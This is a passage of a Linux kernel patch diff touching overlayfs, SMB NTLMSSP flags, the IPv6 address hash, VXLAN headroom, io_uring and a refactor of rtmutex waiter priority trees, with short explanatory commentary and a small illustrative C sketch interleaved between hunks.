+ 	if (!s)
+diff --git a/fs/overlayfs/inode.c b/fs/overlayfs/inode.c
+index 677649b349658..c062f7e2ecb52 100644
+--- a/fs/overlayfs/inode.c
++++ b/fs/overlayfs/inode.c
+@@ -286,8 +286,8 @@ int ovl_permission(struct user_namespace *mnt_userns,
+ 	int err;
+ 
+ 	/* Careful in RCU walk mode */
+-	ovl_i_path_real(inode, &realpath);
+-	if (!realpath.dentry) {
++	realinode = ovl_i_path_real(inode, &realpath);
++	if (!realinode) {
+ 		WARN_ON(!(mask & MAY_NOT_BLOCK));
+ 		return -ECHILD;
+ 	}
+@@ -300,7 +300,6 @@ int ovl_permission(struct user_namespace *mnt_userns,
+ 	if (err)
+ 		return err;
+ 
+-	realinode = d_inode(realpath.dentry);
+ 	old_cred = ovl_override_creds(inode->i_sb);
+ 	if (!upperinode &&
+ 	    !special_file(realinode->i_mode) && mask & MAY_WRITE) {
+diff --git a/fs/proc/vmcore.c b/fs/proc/vmcore.c
+index 5aa527ca6dbe8..1ec0647a20268 100644
+--- a/fs/proc/vmcore.c
++++ b/fs/proc/vmcore.c
+@@ -132,7 +132,7 @@ ssize_t read_from_oldmem(struct iov_iter *iter, size_t count,
+ 			 u64 *ppos, bool encrypted)
+ {
+ 	unsigned long pfn, offset;
+-	size_t nr_bytes;
++	ssize_t nr_bytes;
+ 	ssize_t read = 0, tmp;
+ 	int idx;
+ 
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index 81be17845072a..1e3e22979604f 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -1014,6 +1014,7 @@ setup_ntlm_smb3_neg_ret:
+ }
+ 
+ 
++/* See MS-NLMP 2.2.1.3 */
+ int build_ntlmssp_auth_blob(unsigned char **pbuffer,
+ 					u16 *buflen,
+ 				   struct cifs_ses *ses,
+@@ -1048,7 +1049,8 @@ int build_ntlmssp_auth_blob(unsigned char **pbuffer,
+ 
+ 	flags = ses->ntlmssp->server_flags | NTLMSSP_REQUEST_TARGET |
+ 		NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED;
+-
++	/* we only send version information in ntlmssp negotiate, so do not set this flag */
++	flags = flags & ~NTLMSSP_NEGOTIATE_VERSION;
+ 	tmp = *pbuffer + sizeof(AUTHENTICATE_MESSAGE);
+ 	sec_blob->NegotiateFlags = cpu_to_le32(flags);
+ 
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index 775cdc0b4f249..be572c3a4dcdd 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -584,7 +584,7 @@ static inline signed long dma_fence_wait(struct dma_fence *fence, bool intr)
+ }
+ 
+ struct dma_fence *dma_fence_get_stub(void);
+-struct dma_fence *dma_fence_allocate_private_stub(void);
++struct dma_fence *dma_fence_allocate_private_stub(ktime_t timestamp);
+ u64 dma_fence_context_alloc(unsigned num);
+ 
+ extern const struct dma_fence_ops dma_fence_array_ops;
+diff --git a/include/linux/pwm.h b/include/linux/pwm.h
+index 4de09163c968a..161e91167b9c0 100644
+--- a/include/linux/pwm.h
++++ b/include/linux/pwm.h
+@@ -478,6 +478,11 @@ static inline int pwmchip_remove(struct pwm_chip *chip)
+ 	return -EINVAL;
+ }
+ 
++static inline int devm_pwmchip_add(struct device *dev, struct pwm_chip *chip)
++{
++	return -EINVAL;
++}
++
+ static inline struct pwm_device *pwm_request_from_chip(struct pwm_chip *chip,
+ 						       unsigned int index,
+ 						       const char *label)
+diff --git a/include/net/ipv6.h b/include/net/ipv6.h
+index d383c895592a9..e4ceef687c1c2 100644
+--- a/include/net/ipv6.h
++++ b/include/net/ipv6.h
+@@ -718,12 +718,8 @@ static inline u32 ipv6_addr_hash(const struct in6_addr *a)
+ /* more secured version of ipv6_addr_hash() */
+ static inline u32 __ipv6_addr_jhash(const struct in6_addr *a, const u32 initval)
+ {
+-	u32 v = (__force u32)a->s6_addr32[0] ^ (__force u32)a->s6_addr32[1];
+-
+-	return jhash_3words(v,
+-			    (__force u32)a->s6_addr32[2],
+-			    (__force u32)a->s6_addr32[3],
+-			    initval);
++	return jhash2((__force const u32 *)a->s6_addr32,
++		      ARRAY_SIZE(a->s6_addr32), initval);
+ }
+ 
+ static inline bool ipv6_addr_loopback(const struct in6_addr *a)
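The replaced helper XORed the first two words together before hashing, so any two addresses whose leading 64 bits XOR to the same value collided; jhash2() feeds all four 32-bit words into the hash independently. A worked illustration of the old collision (hypothetical word values):

    /* old: h = jhash_3words(w0 ^ w1, w2, w3, initval)
     *
     *   a = { 0x20010db8, 0x00000000, 0, 1 }   ->  w0 ^ w1 = 0x20010db8
     *   b = { 0x00000000, 0x20010db8, 0, 1 }   ->  w0 ^ w1 = 0x20010db8
     *
     * a and b always hashed identically, whatever the seed; with
     * jhash2() they no longer do.
     */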
+diff --git a/include/net/vxlan.h b/include/net/vxlan.h
+index bca5b01af2475..03bcc1ef0d61e 100644
+--- a/include/net/vxlan.h
++++ b/include/net/vxlan.h
+@@ -378,10 +378,15 @@ static inline netdev_features_t vxlan_features_check(struct sk_buff *skb,
+ 	return features;
+ }
+ 
+-/* IP header + UDP + VXLAN + Ethernet header */
+-#define VXLAN_HEADROOM (20 + 8 + 8 + 14)
+-/* IPv6 header + UDP + VXLAN + Ethernet header */
+-#define VXLAN6_HEADROOM (40 + 8 + 8 + 14)
++static inline int vxlan_headroom(u32 flags)
++{
++	/* VXLAN:     IP4/6 header + UDP + VXLAN + Ethernet header */
++	/* VXLAN-GPE: IP4/6 header + UDP + VXLAN */
++	return (flags & VXLAN_F_IPV6 ? sizeof(struct ipv6hdr) :
++				       sizeof(struct iphdr)) +
++	       sizeof(struct udphdr) + sizeof(struct vxlanhdr) +
++	       (flags & VXLAN_F_GPE ? 0 : ETH_HLEN);
++}
+ 
+ static inline struct vxlanhdr *vxlan_hdr(struct sk_buff *skb)
+ {
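Worked figures from the new helper, against the old fixed macros: classic VXLAN is 20 + 8 + 8 + 14 = 50 bytes over IPv4 (the old VXLAN_HEADROOM) and 40 + 8 + 8 + 14 = 70 over IPv6 (the old VXLAN6_HEADROOM); VXLAN-GPE carries no inner Ethernet header, so it needs only 36 and 56 bytes respectively, which the fixed macros could not express.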
+diff --git a/include/uapi/linux/blkzoned.h b/include/uapi/linux/blkzoned.h
+index b80fcc9ea5257..f85743ef6e7d1 100644
+--- a/include/uapi/linux/blkzoned.h
++++ b/include/uapi/linux/blkzoned.h
+@@ -51,13 +51,13 @@ enum blk_zone_type {
+  *
+  * The Zone Condition state machine in the ZBC/ZAC standards maps the above
+  * definitions as:
+- *   - ZC1: Empty         | BLK_ZONE_EMPTY
++ *   - ZC1: Empty         | BLK_ZONE_COND_EMPTY
+  *   - ZC2: Implicit Open | BLK_ZONE_COND_IMP_OPEN
+  *   - ZC3: Explicit Open | BLK_ZONE_COND_EXP_OPEN
+- *   - ZC4: Closed        | BLK_ZONE_CLOSED
+- *   - ZC5: Full          | BLK_ZONE_FULL
+- *   - ZC6: Read Only     | BLK_ZONE_READONLY
+- *   - ZC7: Offline       | BLK_ZONE_OFFLINE
++ *   - ZC4: Closed        | BLK_ZONE_COND_CLOSED
++ *   - ZC5: Full          | BLK_ZONE_COND_FULL
++ *   - ZC6: Read Only     | BLK_ZONE_COND_READONLY
++ *   - ZC7: Offline       | BLK_ZONE_COND_OFFLINE
+  *
+  * Conditions 0x5 to 0xC are reserved by the current ZBC/ZAC spec and should
+  * be considered invalid.
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index bd7b8cf8bc677..f091153bc8540 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -3477,7 +3477,7 @@ static __cold int io_uring_create(unsigned entries, struct io_uring_params *p,
+ 		ctx->syscall_iopoll = 1;
+ 
+ 	ctx->compat = in_compat_syscall();
+-	if (!capable(CAP_IPC_LOCK))
++	if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK))
+ 		ctx->user = get_uid(current_user());
+ 
+ 	/*
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 728f434de2bbf..21db0df0eb000 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -333,21 +333,43 @@ static __always_inline int __waiter_prio(struct task_struct *task)
+ 	return prio;
+ }
+ 
++/*
++ * Update the waiter->tree copy of the sort keys.
++ */
+ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+-	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	lockdep_assert_held(&waiter->lock->wait_lock);
++	lockdep_assert(RB_EMPTY_NODE(&waiter->tree.entry));
++
++	waiter->tree.prio = __waiter_prio(task);
++	waiter->tree.deadline = task->dl.deadline;
++}
++
++/*
++ * Update the waiter->pi_tree copy of the sort keys (from the tree copy).
++ */
++static __always_inline void
++waiter_clone_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
++{
++	lockdep_assert_held(&waiter->lock->wait_lock);
++	lockdep_assert_held(&task->pi_lock);
++	lockdep_assert(RB_EMPTY_NODE(&waiter->pi_tree.entry));
++
++	waiter->pi_tree.prio = waiter->tree.prio;
++	waiter->pi_tree.deadline = waiter->tree.deadline;
+ }
+ 
+ /*
+- * Only use with rt_mutex_waiter_{less,equal}()
++ * Only use with rt_waiter_node_{less,equal}()
+  */
++#define task_to_waiter_node(p)	\
++	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .tree = *task_to_waiter_node(p) }
+ 
+-static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+-						struct rt_mutex_waiter *right)
++static __always_inline int rt_waiter_node_less(struct rt_waiter_node *left,
++					       struct rt_waiter_node *right)
+ {
+ 	if (left->prio < right->prio)
+ 		return 1;
+@@ -364,8 +386,8 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	return 0;
+ }
+ 
+-static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+-						 struct rt_mutex_waiter *right)
++static __always_inline int rt_waiter_node_equal(struct rt_waiter_node *left,
++						 struct rt_waiter_node *right)
+ {
+ 	if (left->prio != right->prio)
+ 		return 0;
+@@ -385,7 +407,7 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+ 				  struct rt_mutex_waiter *top_waiter)
+ {
+-	if (rt_mutex_waiter_less(waiter, top_waiter))
++	if (rt_waiter_node_less(&waiter->tree, &top_waiter->tree))
+ 		return true;
+ 
+ #ifdef RT_MUTEX_BUILD_SPINLOCKS
+@@ -393,30 +415,30 @@ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+ 	 * Note that RT tasks are excluded from same priority (lateral)
+ 	 * steals to prevent the introduction of an unbounded latency.
+ 	 */
+-	if (rt_prio(waiter->prio) || dl_prio(waiter->prio))
++	if (rt_prio(waiter->tree.prio) || dl_prio(waiter->tree.prio))
+ 		return false;
+ 
+-	return rt_mutex_waiter_equal(waiter, top_waiter);
++	return rt_waiter_node_equal(&waiter->tree, &top_waiter->tree);
+ #else
+ 	return false;
+ #endif
+ }
+ 
+ #define __node_2_waiter(node) \
+-	rb_entry((node), struct rt_mutex_waiter, tree_entry)
++	rb_entry((node), struct rt_mutex_waiter, tree.entry)
+ 
+ static __always_inline bool __waiter_less(struct rb_node *a, const struct rb_node *b)
+ {
+ 	struct rt_mutex_waiter *aw = __node_2_waiter(a);
+ 	struct rt_mutex_waiter *bw = __node_2_waiter(b);
+ 
+-	if (rt_mutex_waiter_less(aw, bw))
++	if (rt_waiter_node_less(&aw->tree, &bw->tree))
+ 		return 1;
+ 
+ 	if (!build_ww_mutex())
+ 		return 0;
+ 
+-	if (rt_mutex_waiter_less(bw, aw))
++	if (rt_waiter_node_less(&bw->tree, &aw->tree))
+ 		return 0;
+ 
+ 	/* NOTE: relies on waiter->ww_ctx being set before insertion */
+@@ -434,48 +456,58 @@ static __always_inline bool __waiter_less(struct rb_node *a, const struct rb_nod
+ static __always_inline void
+ rt_mutex_enqueue(struct rt_mutex_base *lock, struct rt_mutex_waiter *waiter)
+ {
+-	rb_add_cached(&waiter->tree_entry, &lock->waiters, __waiter_less);
++	lockdep_assert_held(&lock->wait_lock);
++
++	rb_add_cached(&waiter->tree.entry, &lock->waiters, __waiter_less);
+ }
+ 
+ static __always_inline void
+ rt_mutex_dequeue(struct rt_mutex_base *lock, struct rt_mutex_waiter *waiter)
+ {
+-	if (RB_EMPTY_NODE(&waiter->tree_entry))
++	lockdep_assert_held(&lock->wait_lock);
++
++	if (RB_EMPTY_NODE(&waiter->tree.entry))
+ 		return;
+ 
+-	rb_erase_cached(&waiter->tree_entry, &lock->waiters);
+-	RB_CLEAR_NODE(&waiter->tree_entry);
++	rb_erase_cached(&waiter->tree.entry, &lock->waiters);
++	RB_CLEAR_NODE(&waiter->tree.entry);
+ }
+ 
+-#define __node_2_pi_waiter(node) \
+-	rb_entry((node), struct rt_mutex_waiter, pi_tree_entry)
++#define __node_2_rt_node(node) \
++	rb_entry((node), struct rt_waiter_node, entry)
+ 
+-static __always_inline bool
+-__pi_waiter_less(struct rb_node *a, const struct rb_node *b)
++static __always_inline bool __pi_waiter_less(struct rb_node *a, const struct rb_node *b)
+ {
+-	return rt_mutex_waiter_less(__node_2_pi_waiter(a), __node_2_pi_waiter(b));
++	return rt_waiter_node_less(__node_2_rt_node(a), __node_2_rt_node(b));
+ }
+ 
+ static __always_inline void
+ rt_mutex_enqueue_pi(struct task_struct *task, struct rt_mutex_waiter *waiter)
+ {
+-	rb_add_cached(&waiter->pi_tree_entry, &task->pi_waiters, __pi_waiter_less);
++	lockdep_assert_held(&task->pi_lock);
++
++	rb_add_cached(&waiter->pi_tree.entry, &task->pi_waiters, __pi_waiter_less);
+ }
+ 
+ static __always_inline void
+ rt_mutex_dequeue_pi(struct task_struct *task, struct rt_mutex_waiter *waiter)
+ {
+-	if (RB_EMPTY_NODE(&waiter->pi_tree_entry))
++	lockdep_assert_held(&task->pi_lock);
++
++	if (RB_EMPTY_NODE(&waiter->pi_tree.entry))
+ 		return;
+ 
+-	rb_erase_cached(&waiter->pi_tree_entry, &task->pi_waiters);
+-	RB_CLEAR_NODE(&waiter->pi_tree_entry);
++	rb_erase_cached(&waiter->pi_tree.entry, &task->pi_waiters);
++	RB_CLEAR_NODE(&waiter->pi_tree.entry);
+ }
+ 
+-static __always_inline void rt_mutex_adjust_prio(struct task_struct *p)
++static __always_inline void rt_mutex_adjust_prio(struct rt_mutex_base *lock,
++						 struct task_struct *p)
+ {
+ 	struct task_struct *pi_task = NULL;
+ 
++	lockdep_assert_held(&lock->wait_lock);
++	lockdep_assert(rt_mutex_owner(lock) == p);
+ 	lockdep_assert_held(&p->pi_lock);
+ 
+ 	if (task_has_pi_waiters(p))
+@@ -571,9 +603,14 @@ static __always_inline struct rt_mutex_base *task_blocked_on_lock(struct task_st
+  * Chain walk basics and protection scope
+  *
+  * [R] refcount on task
+- * [P] task->pi_lock held
++ * [Pn] task->pi_lock held
+  * [L] rtmutex->wait_lock held
+  *
++ * Normal locking order:
++ *
++ *   rtmutex->wait_lock
++ *     task->pi_lock
++ *
+  * Step	Description				Protected by
+  *	function arguments:
+  *	@task					[R]
+@@ -588,27 +625,32 @@ static __always_inline struct rt_mutex_base *task_blocked_on_lock(struct task_st
+  *	again:
+  *	  loop_sanity_check();
+  *	retry:
+- * [1]	  lock(task->pi_lock);			[R] acquire [P]
+- * [2]	  waiter = task->pi_blocked_on;		[P]
+- * [3]	  check_exit_conditions_1();		[P]
+- * [4]	  lock = waiter->lock;			[P]
+- * [5]	  if (!try_lock(lock->wait_lock)) {	[P] try to acquire [L]
+- *	    unlock(task->pi_lock);		release [P]
++ * [1]	  lock(task->pi_lock);			[R] acquire [P1]
++ * [2]	  waiter = task->pi_blocked_on;		[P1]
++ * [3]	  check_exit_conditions_1();		[P1]
++ * [4]	  lock = waiter->lock;			[P1]
++ * [5]	  if (!try_lock(lock->wait_lock)) {	[P1] try to acquire [L]
++ *	    unlock(task->pi_lock);		release [P1]
+  *	    goto retry;
+  *	  }
+- * [6]	  check_exit_conditions_2();		[P] + [L]
+- * [7]	  requeue_lock_waiter(lock, waiter);	[P] + [L]
+- * [8]	  unlock(task->pi_lock);		release [P]
++ * [6]	  check_exit_conditions_2();		[P1] + [L]
++ * [7]	  requeue_lock_waiter(lock, waiter);	[P1] + [L]
++ * [8]	  unlock(task->pi_lock);		release [P1]
+  *	  put_task_struct(task);		release [R]
+  * [9]	  check_exit_conditions_3();		[L]
+  * [10]	  task = owner(lock);			[L]
+  *	  get_task_struct(task);		[L] acquire [R]
+- *	  lock(task->pi_lock);			[L] acquire [P]
+- * [11]	  requeue_pi_waiter(tsk, waiters(lock));[P] + [L]
+- * [12]	  check_exit_conditions_4();		[P] + [L]
+- * [13]	  unlock(task->pi_lock);		release [P]
++ *	  lock(task->pi_lock);			[L] acquire [P2]
++ * [11]	  requeue_pi_waiter(tsk, waiters(lock));[P2] + [L]
++ * [12]	  check_exit_conditions_4();		[P2] + [L]
++ * [13]	  unlock(task->pi_lock);		release [P2]
+  *	  unlock(lock->wait_lock);		release [L]
+  *	  goto again;
++ *
++ * Where P1 is the blocking task and P2 is the lock owner; going up one step
++ * the owner becomes the next blocked task etc..
++ *
+  */
+ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 					      enum rtmutex_chainwalk chwalk,
+@@ -756,7 +798,7 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 	 * enabled we continue, but stop the requeueing in the chain
+ 	 * walk.
+ 	 */
+-	if (rt_mutex_waiter_equal(waiter, task_to_waiter(task))) {
++	if (rt_waiter_node_equal(&waiter->tree, task_to_waiter_node(task))) {
+ 		if (!detect_deadlock)
+ 			goto out_unlock_pi;
+ 		else
+@@ -764,13 +806,18 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 	}
+ 
+ 	/*
+-	 * [4] Get the next lock
++	 * [4] Get the next lock; holding task->pi_lock means the task
++	 * cannot unblock, which guarantees @lock's existence.
+ 	 */
+ 	lock = waiter->lock;
+ 	/*
+ 	 * [5] We need to trylock here as we are holding task->pi_lock,
+ 	 * which is the reverse lock order versus the other rtmutex
+ 	 * operations.
++	 *
++	 * Per the above, holding task->pi_lock guarantees lock exists, so
++	 * inverting this lock order is infeasible from a life-time
++	 * perspective.
+ 	 */
+ 	if (!raw_spin_trylock(&lock->wait_lock)) {
+ 		raw_spin_unlock_irq(&task->pi_lock);
+@@ -874,17 +921,18 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 	 * or
+ 	 *
+ 	 *   DL CBS enforcement advancing the effective deadline.
+-	 *
+-	 * Even though pi_waiters also uses these fields, and that tree is only
+-	 * updated in [11], we can do this here, since we hold [L], which
+-	 * serializes all pi_waiters access and rb_erase() does not care about
+-	 * the values of the node being removed.
+ 	 */
+ 	waiter_update_prio(waiter, task);
+ 
+ 	rt_mutex_enqueue(lock, waiter);
+ 
+-	/* [8] Release the task */
++	/*
++	 * [8] Release the (blocking) task in preparation for
++	 * taking the owner task in [10].
++	 *
++	 * Since we hold lock->wait_lock, the task cannot unblock, even if we
++	 * release task->pi_lock.
++	 */
+ 	raw_spin_unlock(&task->pi_lock);
+ 	put_task_struct(task);
+ 
+@@ -908,7 +956,12 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		return 0;
+ 	}
+ 
+-	/* [10] Grab the next task, i.e. the owner of @lock */
++	/*
++	 * [10] Grab the next task, i.e. the owner of @lock
++	 *
++	 * Per holding lock->wait_lock and checking for !owner above, there
++	 * must be an owner and it cannot go away.
++	 */
+ 	task = get_task_struct(rt_mutex_owner(lock));
+ 	raw_spin_lock(&task->pi_lock);
+ 
+@@ -921,8 +974,9 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		 * and adjust the priority of the owner.
+ 		 */
+ 		rt_mutex_dequeue_pi(task, prerequeue_top_waiter);
++		waiter_clone_prio(waiter, task);
+ 		rt_mutex_enqueue_pi(task, waiter);
+-		rt_mutex_adjust_prio(task);
++		rt_mutex_adjust_prio(lock, task);
+ 
+ 	} else if (prerequeue_top_waiter == waiter) {
+ 		/*
+@@ -937,8 +991,9 @@ static int __sched rt_mutex_adjust_prio_chain(struct task_struct *task,
+ 		 */
+ 		rt_mutex_dequeue_pi(task, waiter);
+ 		waiter = rt_mutex_top_waiter(lock);
++		waiter_clone_prio(waiter, task);
+ 		rt_mutex_enqueue_pi(task, waiter);
+-		rt_mutex_adjust_prio(task);
++		rt_mutex_adjust_prio(lock, task);
+ 	} else {
+ 		/*
+ 		 * Nothing changed. No need to do any priority
+@@ -1154,6 +1209,7 @@ static int __sched task_blocks_on_rt_mutex(struct rt_mutex_base *lock,
+ 	waiter->task = task;
+ 	waiter->lock = lock;
+ 	waiter_update_prio(waiter, task);
++	waiter_clone_prio(waiter, task);
+ 
+ 	/* Get the top priority waiter on the lock */
+ 	if (rt_mutex_has_waiters(lock))
+@@ -1187,7 +1243,7 @@ static int __sched task_blocks_on_rt_mutex(struct rt_mutex_base *lock,
+ 		rt_mutex_dequeue_pi(owner, top_waiter);
+ 		rt_mutex_enqueue_pi(owner, waiter);
+ 
+-		rt_mutex_adjust_prio(owner);
++		rt_mutex_adjust_prio(lock, owner);
+ 		if (owner->pi_blocked_on)
+ 			chain_walk = 1;
+ 	} else if (rt_mutex_cond_detect_deadlock(waiter, chwalk)) {
+@@ -1234,6 +1290,8 @@ static void __sched mark_wakeup_next_waiter(struct rt_wake_q_head *wqh,
+ {
+ 	struct rt_mutex_waiter *waiter;
+ 
++	lockdep_assert_held(&lock->wait_lock);
++
+ 	raw_spin_lock(&current->pi_lock);
+ 
+ 	waiter = rt_mutex_top_waiter(lock);
+@@ -1246,7 +1304,7 @@ static void __sched mark_wakeup_next_waiter(struct rt_wake_q_head *wqh,
+ 	 * task unblocks.
+ 	 */
+ 	rt_mutex_dequeue_pi(current, waiter);
+-	rt_mutex_adjust_prio(current);
++	rt_mutex_adjust_prio(lock, current);
+ 
+ 	/*
+ 	 * As we are waking up the top waiter, and the waiter stays
+@@ -1482,7 +1540,7 @@ static void __sched remove_waiter(struct rt_mutex_base *lock,
+ 	if (rt_mutex_has_waiters(lock))
+ 		rt_mutex_enqueue_pi(owner, rt_mutex_top_waiter(lock));
+ 
+-	rt_mutex_adjust_prio(owner);
++	rt_mutex_adjust_prio(lock, owner);
+ 
+ 	/* Store the lock on which owner is blocked or NULL */
+ 	next_lock = task_blocked_on_lock(owner);
+diff --git a/kernel/locking/rtmutex_api.c b/kernel/locking/rtmutex_api.c
+index cb9fdff76a8a3..a6974d0445930 100644
+--- a/kernel/locking/rtmutex_api.c
++++ b/kernel/locking/rtmutex_api.c
+@@ -459,7 +459,7 @@ void __sched rt_mutex_adjust_pi(struct task_struct *task)
+ 	raw_spin_lock_irqsave(&task->pi_lock, flags);
+ 
+ 	waiter = task->pi_blocked_on;
+-	if (!waiter || rt_mutex_waiter_equal(waiter, task_to_waiter(task))) {
++	if (!waiter || rt_waiter_node_equal(&waiter->tree, task_to_waiter_node(task))) {
+ 		raw_spin_unlock_irqrestore(&task->pi_lock, flags);
+ 		return;
+ 	}
+diff --git a/kernel/locking/rtmutex_common.h b/kernel/locking/rtmutex_common.h
+index c47e8361bfb5c..1162e07cdaea1 100644
+--- a/kernel/locking/rtmutex_common.h
++++ b/kernel/locking/rtmutex_common.h
+@@ -17,27 +17,44 @@
+ #include <linux/rtmutex.h>
+ #include <linux/sched/wake_q.h>
+ 
++
++/*
++ * This is a helper for the struct rt_mutex_waiter below. A waiter goes in two
++ * separate trees and they need their own copy of the sort keys because of
++ * different locking requirements.
++ *
++ * @entry:		rbtree node to enqueue into the waiters tree
++ * @prio:		Priority of the waiter
++ * @deadline:		Deadline of the waiter if applicable
++ *
++ * See rt_waiter_node_less() and waiter_*_prio().
++ */
++struct rt_waiter_node {
++	struct rb_node	entry;
++	int		prio;
++	u64		deadline;
++};
++
+ /*
+  * This is the control structure for tasks blocked on a rt_mutex,
+  * which is allocated on the kernel stack of the blocked task.
+  *
+- * @tree_entry:		pi node to enqueue into the mutex waiters tree
+- * @pi_tree_entry:	pi node to enqueue into the mutex owner waiters tree
++ * @tree:		node to enqueue into the mutex waiters tree
++ * @pi_tree:		node to enqueue into the mutex owner waiters tree
+  * @task:		task reference to the blocked task
+  * @lock:		Pointer to the rt_mutex on which the waiter blocks
+  * @wake_state:		Wakeup state to use (TASK_NORMAL or TASK_RTLOCK_WAIT)
+- * @prio:		Priority of the waiter
+- * @deadline:		Deadline of the waiter if applicable
+  * @ww_ctx:		WW context pointer
++ *
++ * @tree is ordered by @lock->wait_lock
++ * @pi_tree is ordered by rt_mutex_owner(@lock)->pi_lock
+  */
+ struct rt_mutex_waiter {
+-	struct rb_node		tree_entry;
+-	struct rb_node		pi_tree_entry;
++	struct rt_waiter_node	tree;
++	struct rt_waiter_node	pi_tree;
+ 	struct task_struct	*task;
+ 	struct rt_mutex_base	*lock;
+ 	unsigned int		wake_state;
+-	int			prio;
+-	u64			deadline;
+ 	struct ww_acquire_ctx	*ww_ctx;
+ };
+ 
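/*
 * A minimal structural sketch (illustrative types, not the kernel's) of
 * the split above: one waiter sits in two rbtrees at once, so it embeds
 * two nodes, and each node carries its own copy of the sort keys because
 * the trees are serialized by different locks (lock->wait_lock for @tree,
 * rt_mutex_owner(lock)->pi_lock for @pi_tree) and are updated at
 * different points in the chain walk.
 */
struct node {
	void *rb;			/* stand-in for struct rb_node */
	int prio;			/* key copy owned by this tree */
	unsigned long long deadline;
};

struct waiter {
	struct node tree;		/* ordered under lock->wait_lock */
	struct node pi_tree;		/* ordered under owner->pi_lock */
};

/* mirrors waiter_clone_prio(): refresh pi_tree keys from the tree copy */
static void clone_prio(struct waiter *w)
{
	w->pi_tree.prio = w->tree.prio;
	w->pi_tree.deadline = w->tree.deadline;
}

int main(void)
{
	struct waiter w = { .tree = { 0, 5, 100 } };

	clone_prio(&w);
	return (w.pi_tree.prio == 5 && w.pi_tree.deadline == 100) ? 0 : 1;
}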
+@@ -105,7 +122,7 @@ static inline bool rt_mutex_waiter_is_top_waiter(struct rt_mutex_base *lock,
+ {
+ 	struct rb_node *leftmost = rb_first_cached(&lock->waiters);
+ 
+-	return rb_entry(leftmost, struct rt_mutex_waiter, tree_entry) == waiter;
++	return rb_entry(leftmost, struct rt_mutex_waiter, tree.entry) == waiter;
+ }
+ 
+ static inline struct rt_mutex_waiter *rt_mutex_top_waiter(struct rt_mutex_base *lock)
+@@ -113,8 +130,10 @@ static inline struct rt_mutex_waiter *rt_mutex_top_waiter(struct rt_mutex_base *
+ 	struct rb_node *leftmost = rb_first_cached(&lock->waiters);
+ 	struct rt_mutex_waiter *w = NULL;
+ 
++	lockdep_assert_held(&lock->wait_lock);
++
+ 	if (leftmost) {
+-		w = rb_entry(leftmost, struct rt_mutex_waiter, tree_entry);
++		w = rb_entry(leftmost, struct rt_mutex_waiter, tree.entry);
+ 		BUG_ON(w->lock != lock);
+ 	}
+ 	return w;
+@@ -127,8 +146,10 @@ static inline int task_has_pi_waiters(struct task_struct *p)
+ 
+ static inline struct rt_mutex_waiter *task_top_pi_waiter(struct task_struct *p)
+ {
++	lockdep_assert_held(&p->pi_lock);
++
+ 	return rb_entry(p->pi_waiters.rb_leftmost, struct rt_mutex_waiter,
+-			pi_tree_entry);
++			pi_tree.entry);
+ }
+ 
+ #define RT_MUTEX_HAS_WAITERS	1UL
+@@ -190,8 +211,8 @@ static inline void debug_rt_mutex_free_waiter(struct rt_mutex_waiter *waiter)
+ static inline void rt_mutex_init_waiter(struct rt_mutex_waiter *waiter)
+ {
+ 	debug_rt_mutex_init_waiter(waiter);
+-	RB_CLEAR_NODE(&waiter->pi_tree_entry);
+-	RB_CLEAR_NODE(&waiter->tree_entry);
++	RB_CLEAR_NODE(&waiter->pi_tree.entry);
++	RB_CLEAR_NODE(&waiter->tree.entry);
+ 	waiter->wake_state = TASK_NORMAL;
+ 	waiter->task = NULL;
+ }
+diff --git a/kernel/locking/ww_mutex.h b/kernel/locking/ww_mutex.h
+index 56f139201f246..3ad2cc4823e59 100644
+--- a/kernel/locking/ww_mutex.h
++++ b/kernel/locking/ww_mutex.h
+@@ -96,25 +96,25 @@ __ww_waiter_first(struct rt_mutex *lock)
+ 	struct rb_node *n = rb_first(&lock->rtmutex.waiters.rb_root);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline struct rt_mutex_waiter *
+ __ww_waiter_next(struct rt_mutex *lock, struct rt_mutex_waiter *w)
+ {
+-	struct rb_node *n = rb_next(&w->tree_entry);
++	struct rb_node *n = rb_next(&w->tree.entry);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline struct rt_mutex_waiter *
+ __ww_waiter_prev(struct rt_mutex *lock, struct rt_mutex_waiter *w)
+ {
+-	struct rb_node *n = rb_prev(&w->tree_entry);
++	struct rb_node *n = rb_prev(&w->tree.entry);
+ 	if (!n)
